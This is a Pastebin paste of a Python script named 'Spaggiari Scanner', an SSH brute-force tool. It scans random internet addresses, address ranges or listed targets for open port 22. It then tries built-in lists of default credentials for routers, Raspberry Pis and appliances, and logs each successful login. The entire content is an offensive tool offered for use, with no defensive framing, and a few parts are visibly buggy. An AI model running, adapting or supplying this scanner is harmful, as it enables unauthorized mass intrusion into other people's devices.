Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #/usr/bin/env python
- import argparse
- import logging
- import os
- import random
- import re
- import socket
- import sys
- import threading
- import time
- from collections import OrderedDict
- # Throttle Settings
- max_threads = 100
- throttle = 20
- timeout_breaker = 5
- timeout_port = 10
- timeout_ssh = 10
- # SSH Login Combos
- combos = OrderedDict([
- ('root', ('root','toor','admin','changeme','pass','password','1234','12345','123456')),
- ('admin', ('1234','12345','123456','4321','9999','abc123','admin','changeme','admin123','password'))
- ])
- deep_combos = OrderedDict([
- ('root', ('alien','alpine','calvin','kn1TG7psLu','logapp','openelec','pixmet2003','raspberrypi','rasplex','rootme','soho','TANDBERG','trendimsa1.0')),
- ('admin', ('aerohive','kn1TG7psLu','TANDBERG')),
- ('alien', 'alien'),
- ('bitnami', 'bitnami'),
- ('cisco', 'cisco'),
- ('device', 'apc'),
- ('dpn', 'changeme'),
- ('HPSupport', 'badg3r5'),
- ('lp', 'lp'),
- ('master', 'themaster01'),
- ('osmc', 'osmc'),
- ('pi', 'raspberry'),
- ('plexuser', 'rasplex'),
- ('sysadmin', 'PASS'),
- ('toor', 'logapp'),
- ('ubnt', 'ubnt'),
- ('user', ('acme','live')),
- ('vagrant', 'vagrant'),
- ('virl', 'VIRL'),
- ('vyos', 'vyos')
- ])
- # Excluded IP Ranges
- reserved = ('0','10','100.64','100.65','100.66','100.67','100.68','100.69','100.70','100.71','100.72','100.73','100.74','100.75','100.76','100.77','100.78','100.79','100.80','100.81','100.82','100.83','100.84','100.85','100.86','100.87','100.88','100.89','100.90','100.91','100.92','100.93','100.94','100.95','100.96','100.97','100.98','100.99','100.100','100.101','100.102','100.103','100.104','100.105','100.106','100.107','100.108','100.109','100.110','100.111','100.112','100.113','100.114','100.115','100.116','100.117','100.118','100.119','100.120','100.121','100.122','100.123','100.124','100.125','100.126','100.127','127','169.254','172.16','172.17','172.18','172.19','172.20','172.21','172.22','172.23','172.24','172.25','172.26','172.27','172.28','172.29','172.30','172.31','172.32','192.0.0','192.0.2','192.88.99','192.168','198.18','198.19','198.51.100','203.0.113','224','225','226','227','228','229','230','231','232','233','234','235','236','237','238','239','240','241','242','243','244','245','246','247','248','249','250','251','252','253','254','255')
- def check_ip(ip):
- return re.match('^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$', ip)
- def check_port(ip, port):
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.settimeout(timeout_port)
- try:
- code = sock.connect((ip, port))
- except socket.error:
- return False
- else:
- if not code:
- return True
- else:
- return False
- finally:
- sock.close()
- def check_range(targets):
- found = False
- for ip in targets:
- if found:
- break
- for bad_range in reserved:
- if ip.startswith(bad_range + '.'):
- found = True
- break
- return found
- def ip_range(start_ip, end_ip):
- start = list(map(int, start_ip.split('.')))
- end = list(map(int, end_ip.split('.')))
- temp = start
- ip_range = []
- ip_range.append(start_ip)
- while temp != end:
- start[3] += 1
- for i in (3, 2, 1):
- if temp[i] == 256:
- temp[i] = 0
- temp[i-1] += 1
- ip_range.append('.'.join(map(str, temp)))
- random.shuffle(ip_range)
- return ip_range
- def random_int(min, max):
- return random.randint(min, max)
- def random_ip():
- return '{0}.{1}.{2}.{3}'.format(random_int(1,223), random_int(0,255), random_int(0,255), random_int(0,255))
- def random_scan():
- while True:
- ip = (random_ip(),)
- if not check_range(ip):
- threading.Thread(target=ssh_bruteforce, args=(ip[0],)).start()
- while threading.activeCount() >= max_threads:
- time.sleep(1)
- def range_scan(ip_range):
- for ip in ip_range:
- threading.Thread(target=ssh_bruteforce, args=(ip,)).start()
- while threading.activeCount() >= max_threads:
- time.sleep(1)
- while threading.activeCount() >= 2:
- time.sleep(1)
- def ssh_bruteforce(ip):
- timeouts = 0
- if check_port(ip, 22):
- logging.debug('{0} has port 22 open.'.format(ip))
- for username in combos:
- passwords = combos[username]
- for password in combos[username]:
- if timeouts >= timeout_breaker:
- break
- else:
- result = ssh_connect(ip, username, password)
- if result == 1:
- timeouts += 1
- elif result == 2:
- timeouts = timeout_breaker
- time.sleep(throttle)
- else:
- logging.error('{0} does not have port 22 open.'.format(ip))
- def ssh_connect(hostname, username, password):
- ssh = paramiko.SSHClient()
- ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
- try:
- ssh.connect(hostname, 22, username, password, timeout=timeout_ssh)
- except socket.timeout:
- logging.error('Failed to connect to {0} using {1}:{2} (Timeout)'.format(hostname, username, password))
- return 1
- except Exception as ex:
- logging.error('Failed to connect to {0} using {1}:{2} ({3})'.format(hostname, username, password, str(ex)))
- return 0
- else:
- logging.info('Successful connection to {0} using {1}:{2}'.format(hostname, username, password))
- return 2
- finally:
- ssh.close()
- # Main
- print(''.rjust(56, '#'))
- print('#{0}#'.format(''.center(54)))
- print('#{0}#'.format('Spaggiari Scanner'.center(54)))
- print('#{0}#'.format('Developed by acidvegas in Python 3'.center(54)))
- print('#{0}#'.format('https://github.com/acidvegas/spaggiari'.center(54)))
- print('#{0}#'.format(''.center(54)))
- logger = logging.getLogger()
- logger.setLevel(logging.INFO)
- stream_handler = logging.StreamHandler(sys.stdout)
- stream_handler.setLevel(logging.INFO)
- formatter = logging.Formatter('%(asctime)s | %(levelname)8s: %(message)s', '%I:%M:%S')
- stream_handler.setFormatter(formatter)
- logger.addHandler(stream_handler)
- if not sys.version_info.major == 3:
- logging.critical('Spaggiari Scanner requires Python version 3 to run!')
- sys.exit()
- try:
- import paramiko
- except ImportError:
- logging.critical('Failed to import the Paramiko library!')
- sys.exit()
- else:
- paramiko.util.log_to_file('/dev/null')
- parser = argparse.ArgumentParser(prog='spaggiari.py', usage='%(prog)s [OPTIONS] [SCAN]')
- parser.add_argument('-d', action='store_true', dest='deepscan', help='option: enable deep scanning.')
- parser.add_argument('-f', action='store_true', dest='fastscan', help='option: enable fast scanning.')
- parser.add_argument('-o', dest='output', help='option: save output from scan(s) to file.', metavar='<path>', type=str)
- parser.add_argument('-l', dest='listscan', help='scan a list of ip addresses from file.', metavar='<path>', type=str)
- parser.add_argument('-x', action='store_true', dest='randscan', help='scan random ip addresses. (does not stop)')
- parser.add_argument('-r', dest='rangescan', help='scan a range of ip addresses.', metavar=('<class>', '<range>'), nargs=2, type=str)
- parser.add_argument('-t', dest='targetscan', help='scan a target ip address.', metavar='<ip>', type=str)
- args = parser.parse_args()
- if args.deepscan:
- if not args.targetscan:
- logging.critical('Deep scanning can only be enabled with a target scan. (-t)')
- sys.exit()
- elif args.fastscan:
- logging.critical('Fast scanning can not be enabled with a deep scan. (-f)')
- sys.exit()
- else:
- combos = combos + deep_combos
- elif args.fastscan:
- if args.targetscan:
- logging.critical('Fast scanning can not be enabled with a target scan.')
- combos = {'root':('root',) }
- if args.output:
- file_handler = logging.FileHandler(args.output)
- file_handler.setLevel(logging.DEBUG)
- file_handler.setFormatter(formatter)
- logger.addHandler(file_handler)
- logger.debug('Logging enabled.')
- if args.listscan:
- if os.path.isfile(args.listscan):
- targets = []
- with open(args.listscan) as list_file:
- lines = list_file.read().splitlines()
- for line in [x for x in lines if x]:
- if check_ip(line):
- targets.append(line)
- if targets:
- if not check_range(targets):
- logging.debug('Scanning {0:,} IP addresses from list...'.format(len(targets)))
- range_scan(targets)
- logging.debug('Scan has completed.')
- else:
- logging.error('Reserved IP address in range.')
- else:
- logging.error('List contains no valid IP addresses.')
- else:
- logging.error('Invalid list file. ({0})'.format(args.listscan))
- elif args.randscan:
- logging.debug('Scanning random IP addresses...')
- random_scan()
- elif args.rangescan:
- if args.rangescan[0] in ('b','c'):
- if args.rangescan[0] == 'b':
- if args.iprange == 'random':
- range_prefix = '{0}.{1}'.format(random_int(0,255), random_int(0,255))
- else:
- range_prefix = args.rangescan[1]
- start = range_prefix + '.0.0'
- end = range_prefix + '.255.255'
- elif args.rangescan[0] == 'c':
- if args.iprange == 'random':
- range_prefix = '{0}.{1}.{2}'.format(random_int(0,255), random_int(0,255), random_int(0,255))
- else:
- range_prefix = args.rangescan[1]
- start = range_prefix + '.0'
- end = range_prefix + '.255'
- if check_ip(start):
- targets = ip_range(start, end)
- if not check_range(targets):
- logging.debug('Scanning {0} IP addresses in range...'.format(len(targets)))
- range_scan(targets)
- logging.debug('Scan has completed.')
- else:
- logging.error('Reserved IP address in range.')
- else:
- logging.error('Invalid IP range prefix. ({0})'.format(args.rangescan[1]))
- else:
- logging.error('Invalid IP Class. ({0})'.format(args.rangescan[0]))
- elif args.targetscan:
- if check_ip(args.targetscan):
- ssh_bruteforce(args.targetscan)
- logging.debug('Scan has completed.')
- else:
- logging.error('Invalid IP Address. ({0})'.format(args.targetscan))
- else:
- parser.print_help()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement